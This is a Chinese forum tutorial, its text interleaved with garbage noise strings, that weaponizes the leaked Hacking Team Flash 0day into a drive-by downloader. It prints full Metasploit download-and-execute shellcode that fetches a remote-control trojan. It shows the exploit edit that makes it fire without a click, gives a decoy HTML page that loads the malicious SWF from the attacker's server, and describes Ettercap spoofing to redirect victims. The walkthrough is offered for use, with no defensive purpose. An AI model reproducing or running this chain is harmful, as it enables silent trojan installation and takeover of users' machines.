|
. D* z* i$ J: r! u3 h9 }9 T 三、flash 0day之手工代码修改制作下载者实例入侵演示
- m' Y& j- u7 G( V5 ?
9 Y# J" b: k. ?: W9 y. n! C& d: J" E" R2 Q1 {5 J$ j7 F
利用到的工具:
$ h0 s* C* N6 Q, A* q + Z" J0 q# G0 p }3 C4 z# _
( j0 e6 E$ {& D0 T; ? Msf
2 Q1 t3 Z% v3 K! z: ^' T8 \
1 u) j& x8 f& }# E% V) L$ g1 v0 Y9 f2 S! _& t5 U: @# B& T3 E R
Ettercap
( e0 g- S0 t5 u6 h: w% d2 g& e
8 f& A% h, k) l: ~9 h4 N! g
( O' R, Z( L6 t7 @+ g( O* c }: P Adobe Flash CS6 " s2 j, R6 W- y, R
D" P( [; {5 {* z" e9 l) m8 |. m6 G
. {' h# D0 Z4 g% B1 X7 [" ?
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 " m0 G3 e2 h) x! N7 U% J6 c" R( E
# ]* y ?$ C4 x# X& @8 b- [) t X/ x% M2 Q( j" \
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
. W8 H% @, j! I D! p
" M; b I/ Y, I$ _4 ~7 m/ [" }2 R3 m3 u" M2 X; Z: O5 f$ P- i$ d, s
如图: 3 \0 o+ Q- x R' ^4 }2 W4 g
, \5 n# `/ I. V& g6 d3 q% R) p D+ E
+ O; b# B' C6 X! Y $ h6 v6 m3 m8 t! f* D
5 V( [# C8 M* c- Q
9 d+ ~& \2 w4 W, p' J( A 7 w f1 e! @. D1 o! J/ ]5 T
9 K$ W6 G* i: S
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
: J" m* F$ N7 N3 t0 }, E& R$ |' } 5 X8 I4 v; q. L6 K# J2 F1 c% C) Z
4 E7 {2 [* B+ \7 x/ J( w7 n/ I/ x8 [
. g. F' ?+ o# q* {7 @9 z1 o w3 t; A
6 N8 w2 W. I/ }9 I, P1 Y- U$ h9 ?) v" J4 w9 J
# B% @# d7 g* `6 I) \
. M+ S2 m" g# a! H. ^; b8 D. ]1 w+ `+ ?2 ~! n3 s% a
然后执行generate -t dword生成shellcode,如下: a8 a" n1 a2 j4 ~) S8 D- s( T
8 k; X) _- y7 Y0 `* G: G9 o& z! b j3 x8 \. B y @! Q5 l
* m. X) O7 n; |# z# C3 G- G+ Y 2 M4 Q) }2 @7 z: j4 m
7 r3 t8 k( S% G5 j9 K) ?- M
复制代码到文本下便于我们一会编辑flash exp,如下:
+ j: m; D3 q+ a
; a( ]$ X( \( _" S" P
R+ ]# E# H4 w2 C. R 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 3 q& u' o! r* C$ a
; W4 b# l& {# M) U, c
" c& @5 k( d2 u- ?" Y9 k
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, ( M. L: c% ]: M% F6 A' H4 y
* h0 H9 S! a Z) o) L
, i# J! A7 Y1 C7 D 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
" q! d4 X! s, F% V$ s
7 w) F1 |4 ]3 _3 n2 V; d* v, D; y. e* [& f
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
2 G+ Q8 ^0 ]( d( D. ~
: Q' @5 a) ?& V. E% n4 t, ~" Q; B' `# P0 y1 B+ O4 [/ A
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 1 F8 c8 f% h# A& i
& |3 ~) d! V! y/ k
* X* ^" I& o @/ G; n: P% K" R5 v
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, / W; h3 [7 H2 N# S* Q1 R" a( ]3 c
A& ]* \ _0 P2 z! g& _% \' }
! A) W2 J# {* t+ A: e6 Y( v 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 1 j: b% }& i& `" ]9 b i
7 o. t+ J- w+ ` q: ~
! b+ V! ?1 U! \& M+ Q' y8 B 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ! c Q* j% F9 T5 q3 w9 p- O
+ t7 k2 F n2 t# w7 w( s, s0 ?, g; M5 k5 a( Q- Z
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
/ F$ ^) f; d( ]) R) s a) b " O% v0 I- I* t( z" F1 G
+ [5 K. _3 d3 D4 q& Z9 u" a9 l' [0 N 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ) H+ ]8 G6 _$ z& r n
# Z) O8 `$ ~* F9 A
: [1 m: q8 l9 H H& o$ E
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
% K: Y! `: w& z: z$ ^% K7 W
. G# G7 \- ~# G% |& }4 n" g/ J) j: c0 |' e3 U1 W2 b) K0 F; s8 S
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 9 J3 p) g$ P# D- V! K& d
% z$ h: v3 f8 E/ E5 G$ f' I8 ^2 t5 T, N: V: u# u8 a- q# s/ Q; f
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, " o: ~( _3 l1 V+ m! l
2 ?: \, ?9 f% [/ [
* X ~" B/ C7 F) Y' ]+ n, w 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
& Q3 q- j( W2 t% P
+ w+ z; N* i7 u, P7 Z0 C
' ?6 Y9 \) ^5 P/ a8 }1 d
" _7 r/ [1 T& o
1 o7 }4 [8 @! _( }9 X% ~- _, d- q8 }( Y. C0 }& z( T z
$ V/ d/ Z7 r, e# N* Q' W3 r
7 \# [) l3 h$ P& u. u2 U! z1 n- g
下面我们来修改flash 0day exp,需要修改三个文件,分别为: * l- K. U4 B' U) v6 ]) ~
- J- h! B p3 f& p* f2 d c
2 E. X9 Q$ I0 E% {" t7 w4 O/ d8 M
$ u }/ b! c% H0 U9 c& L7 {
5 \: O3 y" _3 A R- ^# e9 }* K: U# e' Q6 i8 e5 r4 j
先修改ShellWin32.as,部分源代码如图:
" a9 ~) ]8 [$ k$ } R 5 N+ [$ Y! @6 h, P
. X( v2 F% O5 T
5 L! u c$ R9 S; a4 q 3 q5 [( A7 s& Y
. f( |% ~) w. D+ Y. z, ?* l 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
2 G% Q' H6 w0 W% i! O p3 a
+ g6 j, @6 ]# K$ g+ T$ U1 ]( {8 n8 z7 K; e. E( ?& b" x
' V+ I$ @. {% K, f( `( Y% z# {; _ 0 ^! d# w- W8 l% d6 F
3 j: G J; {; y+ _5 e0 J 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
4 l6 g0 Q9 ]) s( b) r4 T
9 F, Q8 D9 ^# Y' O; ]! k. p4 T3 M# @
( u. s0 k# J! z ) X' @; }* k5 W" I- Y* L4 f
# N( x* b0 h5 l" g3 q+ q
换行在后面加一句TryExpl();注意是l不是数字1,然后如图: ! O. R+ n( p% R4 G \& ]7 [
9 c5 j4 @, T- u( w& v( }7 Z8 ~
0 ~+ L7 b* c7 M1 ?1 z o% x o9 }
3 f9 l0 ^& \, ~9 N9 K
. ]1 v) f8 n6 r; O9 n
' X5 i {( T* O" E' h" k! G1 A0 @
3 U0 P, p) C- J$ r: e$ e2 @2 g 1 D$ B5 V6 v4 x6 x4 U2 e
/ x5 ~' u$ X8 |6 O( R! e
; w4 @1 v5 N' o |$ \8 Y+ |1 L . \, W( O% d# b( a" S6 E
4 x; B+ ^2 _1 O+ a
然后点保存,下面我们来编译一下,打开
- A0 \, a. l# u
# L% P% D b ` o1 Q$ V2 B7 X# p' C! e: }
exp1.fla然后点文件-发布,看看编译没错误 ( o6 C! `" o4 O$ H0 Y; p' A- h
1 V; t1 H' W- p! M0 x
4 D a5 z0 ?" [ 1 {* F4 ~) _* i8 {
& F6 q( \5 T4 T
5 T' y' _/ N: u0 G4 w2 c9 h9 { - G" `6 [6 v, x3 r
8 M0 Q1 w U6 ?9 L
. }1 i$ G9 J, k! ~/ ?" L) d5 _+ L' b - W0 c1 l' ^0 ^0 h
. h9 R! W+ g2 Q+ y' V& E
* Q: R1 j7 G! c- I8 g
8 d' j' |9 k' M" Q) x % i' e5 }* U* N1 X0 b
1 d* W5 E7 t; F8 i
然后我们把生成的
# c+ r& | `. S# i# v
% K, R4 x4 T- Y, n+ x4 |1 S* G* C$ z: r, U- i7 t
exp1.swf丢到kailinux 的/var/www/html下:
7 B' n7 W* |; ~) h8 Z7 V
6 G. {4 G' o$ L4 J
- E( K( H* Y; V# T4 \+ d& H 然后把这段代码好好编辑一下
( J+ j! S- w7 A. u5 }! f- c1 X1 a
- `$ g( K" _9 A$ p
5 C6 l' F* O2 q+ C h& w, ^8 A7 {
5 p% }, k, P- C+ u$ q3 [- F
O7 T6 l; C7 ]) X. t9 t8 e2 f" O
$ _( {: ^4 S( F) H : z& ]+ x% `% V% H
- u( G/ r; S. F" w( ^1 Q+ `! c
+ F5 w+ P3 B4 d4 Q2 H3 J
0 e- {+ G. j' m8 {2 I
% s1 _. {" B- M, G. ^) q ) M- f4 G% |" @
" u2 ~& J t4 R7 B4 a
T, i J6 h3 a - S5 Q. E7 ` V5 |
7 i/ h, P( N$ K/ _4 f" _1 F2 @$ G
( H' i$ L: [# K w5 r# e
2 Q6 \8 k/ h9 S0 E
* f* i6 S3 \' O5 v+ ^$ U; z1 c6 C' k8 a) ^
<!DOCTYPE html> 4 ^ l, [6 c: @/ c" I6 f/ b& g
! ?% e# w- R; X4 t# x" C Q
3 [7 @) A2 k8 O5 ^ <html>
( Y3 D, Q, W. o$ L
( Y+ B( S* M' f; u& Y/ q! ?$ I5 M2 J1 {+ a, m
<head> 9 U, S8 U) Z+ W2 l0 g' j7 N/ c
( z+ g1 N6 i6 c7 E
0 ?, I; C) q# c <meta http-equiv="Content-Type" content="text/html; `( [ o2 q9 m: G+ |. }
4 {5 {5 F1 f$ q& S
% e3 t: D- K; H& H charset=utf-8"/>
6 ~0 ]) L- K# C+ a3 m6 J
: p, ^% c6 A* i$ P2 c% X8 _' j) u k
</head> 7 G/ m! [9 T* D0 r. _
; Z+ f, T, _7 C5 P' @8 U m' A
& k4 T8 P3 A% ?% T' }9 ~ <body>
0 t0 q( ~3 O8 i' A) h 2 o, a: n0 M& d: S( f- q3 `
7 _% F3 G0 }" Z
<h2> Please wait, the requested page is loading...</h2>
! t& i* Q6 C3 f' G. v; R. Z7 R 2 j0 G' d5 c4 S& @
# I" D) C/ T/ J7 f; O! ^, t) `, f
<br>
# [+ I1 A9 H5 f' r) e+ @4 f 3 S$ D+ B8 g- l2 Y
0 d( V j1 i/ j) @/ _ <OBJECT 3 B: Q' R: ]6 J! c3 t1 Y u. b' A
: k( m6 R& I- D; L) [; M
; d+ ^6 x; u1 a c; A2 f' g7 a, n
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie ! P7 }0 ?& J5 b( Q' l9 |7 `
( [" L, A+ p7 k' B$ k
' Z, C! X1 {) F2 ?4 L0 u VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
7 J# @1 d; Y' D' V) W, E
( c$ m& N( L! ?* m" _ M& X! ?5 l# t% C0 W
</body> , p/ n# p1 {& }0 E/ N9 d+ q. A; A
# l9 G% X) R( K# r7 N
) f$ E4 z9 W5 ^8 ?% H
<script> 2 l# ^( z6 ?9 l6 }0 q) P
9 s* y, p3 Z$ _: \7 A( L$ r# k8 N9 b- o$ M) h6 P( A
setTimeout(function () { 3 p/ x( v4 \2 k: X6 F/ c
- u8 I \$ B! b6 U- r
4 e6 u0 [/ b. p! c4 n/ ~8 ^
6 J- Y% f# J& j( g$ ]
4 |: A0 Q, i& }" n% {. C4 @. X- _+ C
window.location.reload(); . [/ r- R1 I8 \% ^. g3 ^* N
+ V0 n4 D9 V& P$ x* a; i
7 I9 A2 F6 w9 D; b7 d6 Y% w; U1 m7 \; O }, 10000);
' Q1 Q# }$ j: J$ W. T9 p 8 ]3 O' f- l8 K7 b
6 w) J4 q& `5 s# y. i% V3 Y8 Q) h8 B
: U0 B9 a$ a2 V, x: q
/ k2 x% N4 k# ?& C+ @ J- r" F& y6 P0 w! p2 O9 f
</script>
* l4 T6 k9 }* I! [- P% N/ a 9 r E2 K4 G! ?1 V- K! }
4 P5 q% @0 w9 @# d
</html> ) m3 \" i7 ?; g( q# e
0 ^- w6 r7 e5 R
$ M! H5 k1 i% r; v0 c
5 K) y8 x- P3 S! |. d % ?; b7 k' ?0 [6 s3 j/ l2 X
9 L8 }1 f% \6 h 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
S+ |9 p. \5 d0 t4 V/ m! y , K6 [. F0 H# ~. R0 |
7 @# n. g+ g) o8 g( b; T
4 S6 `1 J/ `! e# n2 ~
: L+ U# q* O5 `- D' `- L0 o9 |- r$ z1 p! H9 e3 b
+ \7 V/ r; g/ C: l$ p/ H
: v; n7 K; m& N# s7 d
% l/ r% c% L% e+ O) O) Q, a" m# ^ ! h5 }# H* {& ]
4 G3 { v: w/ o+ ?: }& j8 y" | a& \, G% k' t. q. w# ^# x+ v
3 ^! f4 ~" S0 S0 z: h7 L
8 |8 P5 o+ \7 f. a
. D$ c1 x7 a+ C; V( R
& j5 N3 a) _3 q9 O% H
+ a2 l# H2 c1 J" f6 A
. Q8 I4 G R! K1 S" g& t, T 下面我们用ettercap欺骗如图: - M% r* p, U+ f9 w9 e9 _
2 z5 N: T) e& }$ c. n, V1 |$ ~
) ~! W) L4 o: j4 c8 s
4 I( h, |! p/ n3 A : w! L% C, O1 T# Z
$ [2 A# `5 _, v7 U! x% [ 3 l. H9 [; D2 d
- X$ m/ `* s$ @' |
6 l1 v8 J; Y- q0 u/ S4 s. c3 K
下面我们随便访问个网站看看: % m8 ~* h0 t6 z! d* c
( K* R2 Z6 a3 U8 s7 c1 N5 ~0 N
! `/ X0 S$ C: S1 r1 q 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
# G' b/ [3 m; A ~' @- R
! ?' a! d: O Y7 Q" e0 N8 g0 U% U, V0 C8 Q8 @) W
* T6 h) o( z% g, J
7 r1 ]# s/ q- \$ @2 V5 Y
5 E' ]1 T9 w) y+ G8 l6 F 我们看另一台, 1 a- D! y6 q" E, |4 x2 }6 h
4 s" ?: F! @% R& f6 I2 f0 z0 K
8 Z7 z0 z) B) t% p# G' ?% s% w
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
, n- n$ v) ]0 f2 b1 y9 k5 O5 Y |